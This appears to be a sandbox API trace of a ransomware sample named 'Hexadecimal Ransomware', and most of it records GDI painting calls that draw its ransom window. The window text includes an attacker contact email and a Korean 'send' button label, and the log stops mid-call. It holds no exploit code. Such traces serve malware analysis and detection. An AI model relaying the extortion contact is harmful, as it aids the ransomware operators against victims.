[0162.484] IsThemePartDefined () returned 0x1 [0162.484] IsAppThemed () returned 0x1 [0162.484] GetThemeAppProperties () returned 0x3 [0162.484] GetThemeAppProperties () returned 0x3 [0162.484] IsThemeBackgroundPartiallyTransparent () returned 0x1 [0162.484] IsAppThemed () returned 0x1 [0162.485] GetThemeAppProperties () returned 0x3 [0162.485] GetThemeAppProperties () returned 0x3 [0162.485] IsAppThemed () returned 0x1 [0162.485] GetThemeAppProperties () returned 0x3 [0162.485] GetThemeAppProperties () returned 0x3 [0162.485] IsThemePartDefined () returned 0x1 [0162.485] GdipCreateRegion (region=0x11fe4d0) returned 0x0 [0162.485] GdipGetClip (graphics=0x6e19d10, region=0x6e19ff0) returned 0x0 [0162.485] GdipCreateMatrix (matrix=0x11fe4d0) returned 0x0 [0162.485] GdipGetWorldTransform (graphics=0x6e19d10, matrix=0x6e26fa0) returned 0x0 [0162.485] GdipIsMatrixIdentity (matrix=0x6e26fa0, result=0x11fe4e8) returned 0x0 [0162.485] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1551810 [0162.485] GdipGetMatrixElements (matrix=0x6e26fa0, matrixOut=0x1551810) returned 0x0 [0162.485] LocalFree (hMem=0x1551810) returned 0x0 [0162.485] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1551ae8 [0162.485] GdipGetMatrixElements (matrix=0x6e26fa0, matrixOut=0x1551ae8) returned 0x0 [0162.486] LocalFree (hMem=0x1551ae8) returned 0x0 [0162.486] GdipDeleteMatrix (matrix=0x6e26fa0) returned 0x0 [0162.486] GdipIsInfiniteRegion (region=0x6e19ff0, graphics=0x6e19d10, result=0x11fe510) returned 0x0 [0162.486] GdipIsInfiniteRegion (region=0x6e19ff0, graphics=0x6e19d10, result=0x11fe500) returned 0x0 [0162.486] GdipGetRegionHRgn (region=0x6e19ff0, graphics=0x6e19d10, hRgn=0x11fe500) returned 0x0 [0162.486] GdipDeleteRegion (region=0x6e19ff0) returned 0x0 [0162.486] GdipGetDC (graphics=0x6e19d10, hdc=0x11fe518) returned 0x0 [0162.486] GetCurrentObject (hdc=0x11010812, type=0x1) returned 0xb00017 [0162.486] GetCurrentObject (hdc=0x11010812, type=0x2) returned 0x900010 [0162.486] GetCurrentObject (hdc=0x11010812, type=0x7) returned 0x8050815 [0162.486] GetCurrentObject (hdc=0x11010812, type=0x6) returned 0x8a01c2 [0162.486] SaveDC (hdc=0x11010812) returned 1 [0162.486] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0xe040822 [0162.486] GetClipRgn (hdc=0x11010812, hrgn=0xe040822) returned 0 [0162.487] SelectClipRgn (hdc=0x11010812, hrgn=0xf040825) returned 2 [0162.487] DeleteObject (ho=0xe040822) returned 1 [0162.487] DeleteObject (ho=0xf040825) returned 1 [0162.487] OffsetViewportOrgEx (in: hdc=0x11010812, x=0, y=0, lppt=0x33371a8 | out: lppt=0x33371a8) returned 1 [0162.487] DrawThemeParentBackground () returned 0x0 [0162.487] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fe1dc | out: lpwndpl=0x11fe1dc) returned 1 [0162.487] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe188 | out: lpRect=0x11fe188) returned 1 [0162.487] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0162.487] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0162.487] GetSystemMetrics (nIndex=42) returned 0 [0162.487] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fe030, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0162.488] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fe030) returned 0x16 [0162.488] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe090 | out: lpRect=0x11fe090) returned 1 [0162.488] GetCurrentObject (hdc=0x11010812, type=0x1) returned 0xb00017 [0162.488] GetCurrentObject (hdc=0x11010812, type=0x2) returned 0x900010 [0162.488] GetCurrentObject (hdc=0x11010812, type=0x7) returned 0x8050815 [0162.488] GetCurrentObject (hdc=0x11010812, type=0x6) returned 0x8a01c2 [0162.488] SaveDC (hdc=0x11010812) returned 2 [0162.488] GetNearestColor (hdc=0x11010812, color=0x0) returned 0x0 [0162.488] CreateSolidBrush (color=0x0) returned 0xb100826 [0162.488] FillRect (hDC=0x11010812, lprc=0x11fdf30, hbr=0xb100826) returned 1 [0162.488] DeleteObject (ho=0xb100826) returned 1 [0162.488] RestoreDC (hdc=0x11010812, nSavedDC=-1) returned 1 [0162.488] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0162.488] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0162.489] GetSystemMetrics (nIndex=42) returned 0 [0162.489] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fdfd0, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0162.489] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fdfd0) returned 0x16 [0162.489] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe030 | out: lpRect=0x11fe030) returned 1 [0162.489] GetCurrentObject (hdc=0x11010812, type=0x1) returned 0xb00017 [0162.489] GetCurrentObject (hdc=0x11010812, type=0x2) returned 0x900010 [0162.489] GetCurrentObject (hdc=0x11010812, type=0x7) returned 0x8050815 [0162.489] GetCurrentObject (hdc=0x11010812, type=0x6) returned 0x8a01c2 [0162.489] SaveDC (hdc=0x11010812) returned 2 [0162.489] GetNearestColor (hdc=0x11010812, color=0x0) returned 0x0 [0162.489] CreateSolidBrush (color=0x0) returned 0xc100826 [0162.489] FillRect (hDC=0x11010812, lprc=0x11fded0, hbr=0xc100826) returned 1 [0162.489] DeleteObject (ho=0xc100826) returned 1 [0162.489] RestoreDC (hdc=0x11010812, nSavedDC=-1) returned 1 [0162.489] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0162.490] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0162.490] GetSystemMetrics (nIndex=42) returned 0 [0162.490] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fdfd0, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0162.490] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fdfd0) returned 0x16 [0162.490] RestoreDC (hdc=0x11010812, nSavedDC=-1) returned 1 [0162.490] GdipReleaseDC (graphics=0x6e19d10, hdc=0x11010812) returned 0x0 [0162.490] IsAppThemed () returned 0x1 [0162.490] GetThemeAppProperties () returned 0x3 [0162.490] GetThemeAppProperties () returned 0x3 [0162.490] IsAppThemed () returned 0x1 [0162.490] GetThemeAppProperties () returned 0x3 [0162.490] GetThemeAppProperties () returned 0x3 [0162.490] IsThemePartDefined () returned 0x1 [0162.490] GdipCreateRegion (region=0x11fe454) returned 0x0 [0162.490] GdipGetClip (graphics=0x6e19d10, region=0x6e19ff0) returned 0x0 [0162.491] GdipCreateMatrix (matrix=0x11fe454) returned 0x0 [0162.491] GdipGetWorldTransform (graphics=0x6e19d10, matrix=0x6e26f70) returned 0x0 [0162.491] GdipIsMatrixIdentity (matrix=0x6e26f70, result=0x11fe46c) returned 0x0 [0162.491] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1551a08 [0162.491] GdipGetMatrixElements (matrix=0x6e26f70, matrixOut=0x1551a08) returned 0x0 [0162.491] LocalFree (hMem=0x1551a08) returned 0x0 [0162.491] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1551a08 [0162.491] GdipGetMatrixElements (matrix=0x6e26f70, matrixOut=0x1551a08) returned 0x0 [0162.491] LocalFree (hMem=0x1551a08) returned 0x0 [0162.491] GdipDeleteMatrix (matrix=0x6e26f70) returned 0x0 [0162.491] GdipIsInfiniteRegion (region=0x6e19ff0, graphics=0x6e19d10, result=0x11fe494) returned 0x0 [0162.491] GdipIsInfiniteRegion (region=0x6e19ff0, graphics=0x6e19d10, result=0x11fe484) returned 0x0 [0162.491] GdipGetRegionHRgn (region=0x6e19ff0, graphics=0x6e19d10, hRgn=0x11fe484) returned 0x0 [0162.491] GdipDeleteRegion (region=0x6e19ff0) returned 0x0 [0162.491] GdipGetDC (graphics=0x6e19d10, hdc=0x11fe49c) returned 0x0 [0162.491] GetCurrentObject (hdc=0x11010812, type=0x1) returned 0xb00017 [0162.491] GetCurrentObject (hdc=0x11010812, type=0x2) returned 0x900010 [0162.491] GetCurrentObject (hdc=0x11010812, type=0x7) returned 0x8050815 [0162.492] GetCurrentObject (hdc=0x11010812, type=0x6) returned 0x8a01c2 [0162.492] SaveDC (hdc=0x11010812) returned 1 [0162.492] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10040825 [0162.492] GetClipRgn (hdc=0x11010812, hrgn=0x10040825) returned 0 [0162.492] SelectClipRgn (hdc=0x11010812, hrgn=0x10040822) returned 2 [0162.492] DeleteObject (ho=0x10040825) returned 1 [0162.492] DeleteObject (ho=0x10040822) returned 1 [0162.492] OffsetViewportOrgEx (in: hdc=0x11010812, x=0, y=0, lppt=0x3337b68 | out: lppt=0x3337b68) returned 1 [0162.492] IsAppThemed () returned 0x1 [0162.492] GetThemeAppProperties () returned 0x3 [0162.492] GetThemeAppProperties () returned 0x3 [0162.493] DrawThemeBackground () returned 0x0 [0162.493] RestoreDC (hdc=0x11010812, nSavedDC=-1) returned 1 [0162.493] GdipReleaseDC (graphics=0x6e19d10, hdc=0x11010812) returned 0x0 [0162.493] GdipCreateRegion (region=0x11fe458) returned 0x0 [0162.493] GdipGetClip (graphics=0x6e19d10, region=0x6e19ff0) returned 0x0 [0162.493] GdipCreateMatrix (matrix=0x11fe458) returned 0x0 [0162.493] GdipGetWorldTransform (graphics=0x6e19d10, matrix=0x6e26fa0) returned 0x0 [0162.493] GdipIsMatrixIdentity (matrix=0x6e26fa0, result=0x11fe470) returned 0x0 [0162.493] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1551d50 [0162.494] GdipGetMatrixElements (matrix=0x6e26fa0, matrixOut=0x1551d50) returned 0x0 [0162.494] LocalFree (hMem=0x1551d50) returned 0x0 [0162.494] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1551d18 [0162.494] GdipGetMatrixElements (matrix=0x6e26fa0, matrixOut=0x1551d18) returned 0x0 [0162.494] LocalFree (hMem=0x1551d18) returned 0x0 [0162.494] GdipDeleteMatrix (matrix=0x6e26fa0) returned 0x0 [0162.494] GdipIsInfiniteRegion (region=0x6e19ff0, graphics=0x6e19d10, result=0x11fe498) returned 0x0 [0162.494] GdipIsInfiniteRegion (region=0x6e19ff0, graphics=0x6e19d10, result=0x11fe488) returned 0x0 [0162.494] GdipGetRegionHRgn (region=0x6e19ff0, graphics=0x6e19d10, hRgn=0x11fe488) returned 0x0 [0162.494] GdipDeleteRegion (region=0x6e19ff0) returned 0x0 [0162.494] GdipGetDC (graphics=0x6e19d10, hdc=0x11fe4a0) returned 0x0 [0162.494] GetCurrentObject (hdc=0x11010812, type=0x1) returned 0xb00017 [0162.494] GetCurrentObject (hdc=0x11010812, type=0x2) returned 0x900010 [0162.494] GetCurrentObject (hdc=0x11010812, type=0x7) returned 0x8050815 [0162.494] GetCurrentObject (hdc=0x11010812, type=0x6) returned 0x8a01c2 [0162.495] SaveDC (hdc=0x11010812) returned 1 [0162.495] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x11040822 [0162.495] GetClipRgn (hdc=0x11010812, hrgn=0x11040822) returned 0 [0162.495] SelectClipRgn (hdc=0x11010812, hrgn=0x11040825) returned 2 [0162.495] DeleteObject (ho=0x11040822) returned 1 [0162.495] DeleteObject (ho=0x11040825) returned 1 [0162.495] OffsetViewportOrgEx (in: hdc=0x11010812, x=0, y=0, lppt=0x3337e3c | out: lppt=0x3337e3c) returned 1 [0162.495] IsAppThemed () returned 0x1 [0162.495] GetThemeAppProperties () returned 0x3 [0162.495] GetThemeAppProperties () returned 0x3 [0162.496] GetThemeBackgroundContentRect () returned 0x0 [0162.496] RestoreDC (hdc=0x11010812, nSavedDC=-1) returned 1 [0162.496] GdipReleaseDC (graphics=0x6e19d10, hdc=0x11010812) returned 0x0 [0162.496] IsAppThemed () returned 0x1 [0162.496] GetThemeAppProperties () returned 0x3 [0162.496] GetThemeAppProperties () returned 0x3 [0162.497] GdipGetTextRenderingHint (graphics=0x6e19d10, mode=0x11fe5d4) returned 0x0 [0162.497] GdipGetDC (graphics=0x6e19d10, hdc=0x11fe5c0) returned 0x0 [0162.497] GetCurrentObject (hdc=0x11010812, type=0x1) returned 0xb00017 [0162.497] GetCurrentObject (hdc=0x11010812, type=0x2) returned 0x900010 [0162.497] GetCurrentObject (hdc=0x11010812, type=0x7) returned 0x8050815 [0162.497] GetCurrentObject (hdc=0x11010812, type=0x6) returned 0x8a01c2 [0162.497] SaveDC (hdc=0x11010812) returned 1 [0162.497] GetTextAlign (hdc=0x11010812) returned 0x0 [0162.497] GetTextColor (hdc=0x11010812) returned 0x0 [0162.497] GetCurrentObject (hdc=0x11010812, type=0x6) returned 0x8a01c2 [0162.497] GetObjectW (in: h=0x8a01c2, c=92, pv=0x11fe308 | out: pv=0x11fe308) returned 92 [0162.498] SelectObject (hdc=0x11010812, h=0x170a07ff) returned 0x8a01c2 [0162.498] GetBkMode (hdc=0x11010812) returned 2 [0162.498] SetBkMode (hdc=0x11010812, mode=1) returned 2 [0162.498] DrawTextExW (in: hdc=0x11010812, lpchText="전송하기", cchText=4, lprc=0x11fe3f0, format=0x102415, lpdtp=0x33381dc | out: lpchText="전송하기", lprc=0x11fe3f0) returned 13 [0162.500] DrawTextExW (in: hdc=0x11010812, lpchText="전송하기", cchText=4, lprc=0x11fe554, format=0x102015, lpdtp=0x33381dc | out: lpchText="전송하기", lprc=0x11fe554) returned 13 [0162.613] RestoreDC (hdc=0x11010812, nSavedDC=-1) returned 1 [0162.613] GdipReleaseDC (graphics=0x6e19d10, hdc=0x11010812) returned 0x0 [0162.613] GetFocus () returned 0x102d8 [0162.614] IsAppThemed () returned 0x1 [0162.614] GetThemeAppProperties () returned 0x3 [0162.614] GetThemeAppProperties () returned 0x3 [0162.614] GdipGetDC (graphics=0x6e19d10, hdc=0x11fe7a0) returned 0x0 [0162.614] BitBlt (hdc=0xf0105ee, x=0, y=0, cx=64, cy=25, hdcSrc=0x11010812, x1=0, y1=0, rop=0xcc0020) returned 1 [0162.614] GdipReleaseDC (graphics=0x6e19d10, hdc=0x11010812) returned 0x0 [0162.614] SelectPalette (hdc=0xf0105ee, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0162.614] SelectObject (hdc=0x11010812, h=0x85000f) returned 0x8050815 [0162.614] DeleteDC (hdc=0x11010812) returned 1 [0162.614] GdipDeleteGraphics (graphics=0x6e19d10) returned 0x0 [0162.615] EndPaint (hWnd=0x102d8, lpPaint=0x11fe744) returned 1 [0162.615] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0162.615] IsWindowUnicode (hWnd=0x102da) returned 1 [0162.615] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0162.615] TranslateMessage (lpMsg=0x11fed00) returned 0 [0162.615] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0162.615] BeginPaint (in: hWnd=0x102da, lpPaint=0x11fe754 | out: lpPaint=0x11fe754) returned 0x10105d6 [0162.615] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102da, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0162.616] SelectPalette (hdc=0x10105d6, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0162.616] CreateCompatibleDC (hdc=0x10105d6) returned 0x14010812 [0162.616] DeleteObject (ho=0x8050815) returned 1 [0162.616] GetObjectType (h=0x10105d6) returned 0x3 [0162.616] CreateCompatibleBitmap (hdc=0x10105d6, cx=1, cy=1) returned 0x605081d [0162.616] GetDIBits (in: hdc=0x10105d6, hbm=0x605081d, start=0x0, cLines=0x0, lpvBits=0x0, lpbmi=0x11fe244, usage=0x0 | out: lpvBits=0x0, lpbmi=0x11fe244) returned 1 [0162.617] GetDIBits (in: hdc=0x10105d6, hbm=0x605081d, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x11fe244, usage=0x0 | out: lpvBits=0x0, lpbmi=0x11fe244) returned 1 [0162.617] DeleteObject (ho=0x605081d) returned 1 [0162.617] CreateDIBSection (in: hdc=0x10105d6, lpbmi=0x11fe294, usage=0x0, ppvBits=0x11fe788, hSection=0x0, offset=0x0 | out: ppvBits=0x11fe788) returned 0x9050815 [0162.617] SelectObject (hdc=0x14010812, h=0x9050815) returned 0x85000f [0162.617] GdipCreateFromHDC (hdc=0x14010812, graphics=0x11fe76c) returned 0x0 [0162.617] GdipTranslateWorldTransform (graphics=0x6e19d10, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0162.617] GdipSetClipRectI (graphics=0x6e19d10, x=0, y=0, width=150, height=16, combineMode=0x0) returned 0x0 [0162.617] GdipCreateMatrix (matrix=0x11fe7b4) returned 0x0 [0162.617] GdipGetWorldTransform (graphics=0x6e19d10, matrix=0x6e26f70) returned 0x0 [0162.618] GdipIsMatrixIdentity (matrix=0x6e26f70, result=0x11fe7cc) returned 0x0 [0162.618] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1551a08 [0162.618] GdipGetMatrixElements (matrix=0x6e26f70, matrixOut=0x1551a08) returned 0x0 [0162.618] LocalFree (hMem=0x1551a08) returned 0x0 [0162.618] GdipDeleteMatrix (matrix=0x6e26f70) returned 0x0 [0162.618] GdipCreateRegion (region=0x11fe7b4) returned 0x0 [0162.618] GdipGetClip (graphics=0x6e19d10, region=0x6e19ff0) returned 0x0 [0162.619] GdipIsInfiniteRegion (region=0x6e19ff0, graphics=0x6e19d10, result=0x11fe7c0) returned 0x0 [0162.619] GdipSaveGraphics (graphics=0x6e19d10, state=0x11fe7ec) returned 0x0 [0162.619] GetWindowTextLengthW (hWnd=0x102da) returned 26 [0162.619] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102da, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x1a [0162.619] GetSystemMetrics (nIndex=42) returned 0 [0162.619] GetWindowTextW (in: hWnd=0x102da, lpString=0x11fe6d0, nMaxCount=27 | out: lpString="E-Mail: sealocker@daum.net") returned 26 [0162.619] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102da, Msg=0xd, wParam=0x1b, lParam=0x11fe6d0) returned 0x1a [0162.619] GetClientRect (in: hWnd=0x102da, lpRect=0x11fe7b4 | out: lpRect=0x11fe7b4) returned 1 [0162.620] GdipCreateRegion (region=0x11fe608) returned 0x0 [0162.620] GdipGetClip (graphics=0x6e19d10, region=0x6e1a2e0) returned 0x0 [0162.620] GdipCreateMatrix (matrix=0x11fe608) returned 0x0 [0162.620] GdipGetWorldTransform (graphics=0x6e19d10, matrix=0x6e26fa0) returned 0x0 [0162.620] GdipIsMatrixIdentity (matrix=0x6e26fa0, result=0x11fe620) returned 0x0 [0162.620] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1551810 [0162.620] GdipGetMatrixElements (matrix=0x6e26fa0, matrixOut=0x1551810) returned 0x0 [0162.620] LocalFree (hMem=0x1551810) returned 0x0 [0162.620] GdipCombineRegionRegion (region=0x6e1a2e0, region2=0x6e19ff0, combineMode=0x1) returned 0x0 [0162.620] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1551810 [0162.620] GdipGetMatrixElements (matrix=0x6e26fa0, matrixOut=0x1551810) returned 0x0 [0162.620] LocalFree (hMem=0x1551810) returned 0x0 [0162.620] GdipDeleteMatrix (matrix=0x6e26fa0) returned 0x0 [0162.620] GdipIsInfiniteRegion (region=0x6e1a2e0, graphics=0x6e19d10, result=0x11fe648) returned 0x0 [0162.620] GdipIsInfiniteRegion (region=0x6e1a2e0, graphics=0x6e19d10, result=0x11fe638) returned 0x0 [0162.620] GdipGetRegionHRgn (region=0x6e1a2e0, graphics=0x6e19d10, hRgn=0x11fe638) returned 0x0 [0162.620] GdipDeleteRegion (region=0x6e1a2e0) returned 0x0 [0162.621] GdipGetDC (graphics=0x6e19d10, hdc=0x11fe650) returned 0x0 [0162.621] GetCurrentObject (hdc=0x14010812, type=0x1) returned 0xb00017 [0162.621] GetCurrentObject (hdc=0x14010812, type=0x2) returned 0x900010 [0162.621] GetCurrentObject (hdc=0x14010812, type=0x7) returned 0x9050815 [0162.621] GetCurrentObject (hdc=0x14010812, type=0x6) returned 0x8a01c2 [0162.621] SaveDC (hdc=0x14010812) returned 1 [0162.621] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x12040825 [0162.621] GetClipRgn (hdc=0x14010812, hrgn=0x12040825) returned 0 [0162.621] SelectClipRgn (hdc=0x14010812, hrgn=0x14040822) returned 2 [0162.621] DeleteObject (ho=0x12040825) returned 1 [0162.621] DeleteObject (ho=0x14040822) returned 1 [0162.621] OffsetViewportOrgEx (in: hdc=0x14010812, x=0, y=0, lppt=0x3339760 | out: lppt=0x3339760) returned 1 [0162.621] GetNearestColor (hdc=0x14010812, color=0x0) returned 0x0 [0162.621] CreateSolidBrush (color=0x0) returned 0xd100826 [0162.621] FillRect (hDC=0x14010812, lprc=0x11fe654, hbr=0xd100826) returned 1 [0162.622] DeleteObject (ho=0xd100826) returned 1 [0162.622] RestoreDC (hdc=0x14010812, nSavedDC=-1) returned 1 [0162.622] GdipReleaseDC (graphics=0x6e19d10, hdc=0x14010812) returned 0x0 [0162.622] GdipRestoreGraphics (graphics=0x6e19d10, state=0xfdaf0dbd) returned 0x0 [0162.622] GdipDeleteRegion (region=0x6e19ff0) returned 0x0 [0162.622] GetWindowTextLengthW (hWnd=0x102da) returned 26 [0162.622] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102da, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x1a [0162.622] GetSystemMetrics (nIndex=42) returned 0 [0162.622] GetWindowTextW (in: hWnd=0x102da, lpString=0x11fe6d0, nMaxCount=27 | out: lpString="E-Mail: sealocker@daum.net") returned 26 [0162.622] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102da, Msg=0xd, wParam=0x1b, lParam=0x11fe6d0) returned 0x1a [0162.622] GdipGetDC (graphics=0x6e19d10, hdc=0x11fe670) returned 0x0 [0162.622] GetCurrentObject (hdc=0x14010812, type=0x1) returned 0xb00017 [0162.622] GetCurrentObject (hdc=0x14010812, type=0x2) returned 0x900010 [0162.622] GetCurrentObject (hdc=0x14010812, type=0x7) returned 0x9050815 [0162.622] GetCurrentObject (hdc=0x14010812, type=0x6) returned 0x8a01c2 [0162.623] SaveDC (hdc=0x14010812) returned 1 [0162.623] GetNearestColor (hdc=0x14010812, color=0xffffff) returned 0xffffff [0162.623] RestoreDC (hdc=0x14010812, nSavedDC=-1) returned 1 [0162.623] GdipReleaseDC (graphics=0x6e19d10, hdc=0x14010812) returned 0x0 [0162.623] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x740d0000 [0162.623] AdjustWindowRectEx (in: lpRect=0x11fe590, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fe590) returned 1 [0162.624] SystemParametersInfoW (in: uiAction=0x100a, uiParam=0x0, pvParam=0x11fe614, fWinIni=0x0 | out: pvParam=0x11fe614) returned 1 [0162.624] SendMessageW (hWnd=0x202c8, Msg=0x127, wParam=0x30001, lParam=0x0) returned 0x0 [0162.624] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x127, wParam=0x30001, lParam=0x0) returned 0x0 [0162.624] GdipGetTextRenderingHint (graphics=0x6e19d10, mode=0x11fe610) returned 0x0 [0162.624] GdipGetDC (graphics=0x6e19d10, hdc=0x11fe5fc) returned 0x0 [0162.624] GetCurrentObject (hdc=0x14010812, type=0x1) returned 0xb00017 [0162.624] GetCurrentObject (hdc=0x14010812, type=0x2) returned 0x900010 [0162.624] GetCurrentObject (hdc=0x14010812, type=0x7) returned 0x9050815 [0162.624] GetCurrentObject (hdc=0x14010812, type=0x6) returned 0x8a01c2 [0162.624] SaveDC (hdc=0x14010812) returned 1 [0162.625] GetTextAlign (hdc=0x14010812) returned 0x0 [0162.625] GetTextColor (hdc=0x14010812) returned 0x0 [0162.625] SetTextColor (hdc=0x14010812, color=0xffffff) returned 0x0 [0162.625] GetCurrentObject (hdc=0x14010812, type=0x6) returned 0x8a01c2 [0162.625] GetObjectW (in: h=0x8a01c2, c=92, pv=0x11fe344 | out: pv=0x11fe344) returned 92 [0162.625] SelectObject (hdc=0x14010812, h=0x760a07f4) returned 0x8a01c2 [0162.625] GetBkMode (hdc=0x14010812) returned 2 [0162.625] SetBkMode (hdc=0x14010812, mode=1) returned 2 [0162.625] DrawTextExW (in: hdc=0x14010812, lpchText="E-Mail: sealocker@daum.net", cchText=26, lprc=0x11fe590, format=0x100000, lpdtp=0x3339cf0 | out: lpchText="E-Mail: sealocker@daum.net", lprc=0x11fe590) returned 16 [0162.633] RestoreDC (hdc=0x14010812, nSavedDC=-1) returned 1 [0162.633] GdipReleaseDC (graphics=0x6e19d10, hdc=0x14010812) returned 0x0 [0162.633] GdipGetDC (graphics=0x6e19d10, hdc=0x11fe7ac) returned 0x0 [0162.633] BitBlt (hdc=0x10105d6, x=0, y=0, cx=181, cy=16, hdcSrc=0x14010812, x1=0, y1=0, rop=0xcc0020) returned 1 [0162.634] GdipReleaseDC (graphics=0x6e19d10, hdc=0x14010812) returned 0x0 [0162.634] SelectPalette (hdc=0x10105d6, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0162.634] SelectObject (hdc=0x14010812, h=0x85000f) returned 0x9050815 [0162.634] DeleteDC (hdc=0x14010812) returned 1 [0162.634] GdipDeleteGraphics (graphics=0x6e19d10) returned 0x0 [0162.634] EndPaint (hWnd=0x102da, lpPaint=0x11fe750) returned 1 [0162.634] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0162.634] IsWindowUnicode (hWnd=0x102dc) returned 1 [0162.634] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0162.634] TranslateMessage (lpMsg=0x11fed00) returned 0 [0162.634] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0162.634] BeginPaint (in: hWnd=0x102dc, lpPaint=0x11fe754 | out: lpPaint=0x11fe754) returned 0xf0105ee [0162.635] CallWindowProcW (lpPrevWndFunc=0x7414abc0, hWnd=0x102dc, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0162.635] SelectPalette (hdc=0xf0105ee, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0162.635] CreateCompatibleDC (hdc=0xf0105ee) returned 0x17010812 [0162.635] DeleteObject (ho=0x9050815) returned 1 [0162.635] GetObjectType (h=0xf0105ee) returned 0x3 [0162.635] CreateCompatibleBitmap (hdc=0xf0105ee, cx=1, cy=1) returned 0x805081d [0162.636] GetDIBits (in: hdc=0xf0105ee, hbm=0x805081d, start=0x0, cLines=0x0, lpvBits=0x0, lpbmi=0x11fe244, usage=0x0 | out: lpvBits=0x0, lpbmi=0x11fe244) returned 1 [0162.636] GetDIBits (in: hdc=0xf0105ee, hbm=0x805081d, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x11fe244, usage=0x0 | out: lpvBits=0x0, lpbmi=0x11fe244) returned 1 [0162.636] DeleteObject (ho=0x805081d) returned 1 [0162.636] CreateDIBSection (in: hdc=0xf0105ee, lpbmi=0x11fe294, usage=0x0, ppvBits=0x11fe788, hSection=0x0, offset=0x0 | out: ppvBits=0x11fe788) returned 0xa050815 [0162.636] SelectObject (hdc=0x17010812, h=0xa050815) returned 0x85000f [0162.636] GdipCreateFromHDC (hdc=0x17010812, graphics=0x11fe76c) returned 0x0 [0162.637] GdipTranslateWorldTransform (graphics=0x6e19d10, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0162.637] GdipSetClipRectI (graphics=0x6e19d10, x=0, y=0, width=301, height=24, combineMode=0x0) returned 0x0 [0162.637] GdipCreateMatrix (matrix=0x11fe7b4) returned 0x0 [0162.637] GdipGetWorldTransform (graphics=0x6e19d10, matrix=0x6e26f70) returned 0x0 [0162.637] GdipIsMatrixIdentity (matrix=0x6e26f70, result=0x11fe7cc) returned 0x0 [0162.637] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1551a08 [0162.637] GdipGetMatrixElements (matrix=0x6e26f70, matrixOut=0x1551a08) returned 0x0 [0162.637] LocalFree (hMem=0x1551a08) returned 0x0 [0162.637] GdipDeleteMatrix (matrix=0x6e26f70) returned 0x0 [0162.637] GdipCreateRegion (region=0x11fe7b4) returned 0x0 [0162.638] GdipGetClip (graphics=0x6e19d10, region=0x6e19ff0) returned 0x0 [0162.638] GdipIsInfiniteRegion (region=0x6e19ff0, 